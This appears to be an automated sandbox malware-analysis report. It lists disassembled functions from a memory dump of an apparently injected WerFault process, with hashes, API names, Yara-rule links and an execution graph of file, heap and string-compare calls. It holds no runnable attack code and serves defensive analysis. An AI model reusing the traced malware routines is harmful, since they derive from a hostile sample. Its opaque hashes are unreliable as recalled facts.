                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8811AC70314FF082FA58B3E29A5D7292252AF447FCF1403A4AC36A77DEDE2AC4458E00
                                                                                                                                                                                                                                                Function 00000265B3C019A4 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: feb2a10e1dbac8b2057ba4fd8a4a59a85494e341ddde97ed423a7f12b22e8d62
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67018031300EA096EB50DB92E45C359A3A1FB88FC8FA84034DE8963758DF3EC959C700
                                                                                                                                                                                                                                                Function 00000265B3C036DC Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 449555515-0
                                                                                                                                                                                                                                                • Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction ID: 50df3790e3e6610717c87c47698b3d0c1b550baa087b6062a74a139a7456795a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F012975711F7086EB649BA5E81C31962A4BF48B8AF540128CE8927369EF3EC518DB04
                                                                                                                                                                                                                                                Function 00000265B3C03058 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: b4d8089dee392d1a3fa0bb457632b42721e2caee24f374947a88adb3a52736d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00F08270314FB091EA048B93F91C119A261AF48FD8F548031EE8A27B1CCF3DC495C700
                                                                                                                                                                                                                                                Function 00000265B3C0C208 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: d42a3ba1e659b2f51b9ab46885df229ae9ecb53eaeaeb8013c647c9e96035245
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83F06275211E3491EB108BA4E44C3595320EF85B69F64421ACA6A596F9CF2EC154D700
                                                                                                                                                                                                                                                Function 00000265B3C050E0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction ID: e746b50112f850f070068e887a8b3576dfb0868463e56809d211077fdefce0a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B602C83621DBE486EB60CB95E49435AB7A0F7C4798F104015EA8E97BA8DF7EC844CF00
                                                                                                                                                                                                                                                Function 00000265B3C05720 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction ID: 144f0c22e287931e6232cefa605c0a9db5a7f50df834e3f038ee37cc907f94cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F561DA76519FA4C7E7608B99E45831AB7A0F788788F105255FA8D53BACDB7EC940CF00
                                                                                                                                                                                                                                                Function 00000265B3C14674 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: c989fef3bf337ca562cee92529b7291bb130821883d4082647cce761f03871b3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F511A936AF0E7141F65423E8D45E36911706F6977CF350674A9B7367EECA2688426100
                                                                                                                                                                                                                                                Function 00000265B3C08580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: cf8963f98abd2b82eaee3ee45e7406df1f6bc69c69f16fd2fa698abaf44b4765
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E51CD32311FB08AEB54DB99E448B6C7795EB44B9CF518161EA466378CDB3AE841CB08
                                                                                                                                                                                                                                                Function 00000265B3C0AFC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 8bd76bcae79b7b7819a18e225f38fd455d22610d64dd387b94865d63f31cf005
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF619D72508FE482EB60CF55E44439AB7A0FB85B98F048255EB9923B99DF3AD194CF00
                                                                                                                                                                                                                                                Function 00000265B3C0B370 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: dcad42909409d285cffe862b5d4df63eda30ab524c9275e52c4e42825555b531
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C951BE32100AF0C6EB64DFE5954835977A2FB54B8CF188195DA89A7BD9CF3AC560CF00
                                                                                                                                                                                                                                                Function 00000265B3C02F18 Relevance: 6.3, APIs: 5, Instructions: 93memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction ID: cb1ab5472dd8b0f5c5fa24d9c03472d00d91ae99d64c63d32ac98184a23b86b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0316231701FB192EA61DF96E948769A7A0FF44BC8F184024DF8957B59EF36C465CB00
                                                                                                                                                                                                                                                Function 00000265B3C125C8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction ID: 672ed83e570dcb392832020153011d0660b0c04c4a9a4ac5bd7d9e9b6a7bf364
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDD1EE36B14EA089E721CFA9D4483AC37B1FB44BACF248216CE5DA7B9DDA35C446D740
                                                                                                                                                                                                                                                Function 00000265B3C12EF0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction ID: 82b8a53827fd129fff10ec915a8dd3a70280cd5c0f23d612c8065f3ccaa5e698
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52919E72700E7085FBA1DFA9D8883AD2BA4BB44B8CF344109DE4A77699DB37C442E700
                                                                                                                                                                                                                                                Function 00000265B3C07970 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction ID: f73215e7dad455afb231f26c2086af343a6a6e9c7bc1bfba46c417bac58a4cb6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60113C36710F618AEB40CFA1E8583A833A4FB1975CF541E21DE6D977A8DF79D1A88340
                                                                                                                                                                                                                                                Function 00000265B3C02338 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction ID: 80fd0e0e5efeabf350905499890869361a0a2bc7408110491b8c8e6118925359
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86512436208FF081E666DEE9A05C3AE6795FB85788F844065DE4923B9DCB3BC508CF40
                                                                                                                                                                                                                                                Function 00000265B3C12C60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction ID: 13e1fa06cd8b34395c7c577ad4a22f781b66b8383201e561f6a86c0ad850ce28
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6641C476314EA086EB60DF65E8483AA77A0FB98788F504121EE4D9779CEB7DC441DB40
                                                                                                                                                                                                                                                Function 00000265B3C08A58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction ID: 10a7dd7db16448f407446f6983adb9c4268c20a4eced4795eb3bfa5357d16e64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44112B32215FA082EB618B15E444359B7E4FB88B98F598260EFCD17B68EF3DC551CB04
                                                                                                                                                                                                                                                Function 00000265B3C01BFC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: 092e01609e4caf6e613b8fa8b6b67293fe47d5e72895b9d6f37fcb24ee187790
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0811B235601FA481EA44DBA6E40C22977A0FF88FC8F285068CE4D63769DF3AC452D700
                                                                                                                                                                                                                                                Function 00000265B3C01268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: 0a849bc9c004dcd1a9c72428d56cbea6717bb06f47582cd4cae041660eb30b01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CE06D75601E2486EB448FA2D80C34A36E1FF89F0AF25C024CD8907355DFBF84AAD750

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:0.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:123
                                                                                                                                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                                                                                                                                execution_graph 16228 17d2dd22750 16230 17d2dd2277e 16228->16230 16229 17d2dd2286c LoadLibraryA 16229->16230 16230->16229 16231 17d2dd228e8 16230->16231 16232 17d2dd52034 16233 17d2dd52065 16232->16233 16234 17d2dd5217b 16233->16234 16240 17d2dd52089 16233->16240 16241 17d2dd52146 16233->16241 16235 17d2dd52180 16234->16235 16237 17d2dd521ef 16234->16237 16250 17d2dd52f18 GetProcessHeap 16235->16250 16239 17d2dd52f18 9 API calls 16237->16239 16237->16241 16238 17d2dd520c1 StrCmpNIW 16238->16240 16239->16241 16240->16238 16240->16241 16243 17d2dd51bfc 16240->16243 16241->16241 16244 17d2dd51c23 GetProcessHeap 16243->16244 16245 17d2dd51c97 16243->16245 16247 17d2dd51c49 __std_exception_copy 16244->16247 16245->16240 16246 17d2dd51c7f GetProcessHeap HeapFree 16246->16245 16247->16245 16247->16246 16256 17d2dd51534 16247->16256 16255 17d2dd52f54 __std_exception_copy 16250->16255 16251 17d2dd53029 GetProcessHeap HeapFree 16251->16241 16252 17d2dd53024 16252->16251 16253 17d2dd52fb6 StrCmpNIW 16253->16255 16254 17d2dd51bfc 5 API calls 16254->16255 16255->16251 16255->16252 16255->16253 16255->16254 16257 17d2dd51584 16256->16257 16260 17d2dd5154e 16256->16260 16257->16246 16258 17d2dd5156d StrCmpW 16258->16260 16259 17d2dd51565 StrCmpIW 16259->16260 16260->16257 16260->16258 16260->16259 16261 17d2dd52544 16262 17d2dd525c3 16261->16262 16263 17d2dd52625 GetFileType 16262->16263 16274 17d2dd526f4 16262->16274 16264 17d2dd52633 StrCpyW 16263->16264 16265 17d2dd52649 16263->16265 16266 17d2dd52658 16264->16266 16277 17d2dd51a48 GetFinalPathNameByHandleW 16265->16277 16271 17d2dd526f9 16266->16271 16275 17d2dd52662 16266->16275 16268 17d2dd53858 StrCmpNIW 16268->16271 16270 17d2dd53058 4 API calls 16270->16271 16271->16268 16271->16270 16272 17d2dd51cb4 2 API calls 16271->16272 16271->16274 16272->16271 16275->16274 16282 17d2dd53858 16275->16282 16285 17d2dd53058 StrCmpIW 16275->16285 16289 17d2dd51cb4 16275->16289 16278 17d2dd51a72 StrCmpNIW 16277->16278 16279 17d2dd51ab1 16277->16279 16278->16279 16280 17d2dd51a8c lstrlenW 16278->16280 16279->16266 16280->16279 16281 17d2dd51a9e StrCpyW 16280->16281 16281->16279 16283 17d2dd5387a 16282->16283 16284 17d2dd53865 StrCmpNIW 16282->16284 16283->16275 16284->16283 16286 17d2dd530a1 PathCombineW 16285->16286 16287 17d2dd5308a StrCpyW StrCatW 16285->16287 16288 17d2dd530aa 16286->16288 16287->16288 16288->16275 16290 17d2dd51cd4 16289->16290 16291 17d2dd51ccb 16289->16291 16290->16275 16292 17d2dd51534 2 API calls 16291->16292 16292->16290 16293 17d2dd51ac4 16298 17d2dd51630 GetProcessHeap 16293->16298 16295 17d2dd51ada Sleep SleepEx 16296 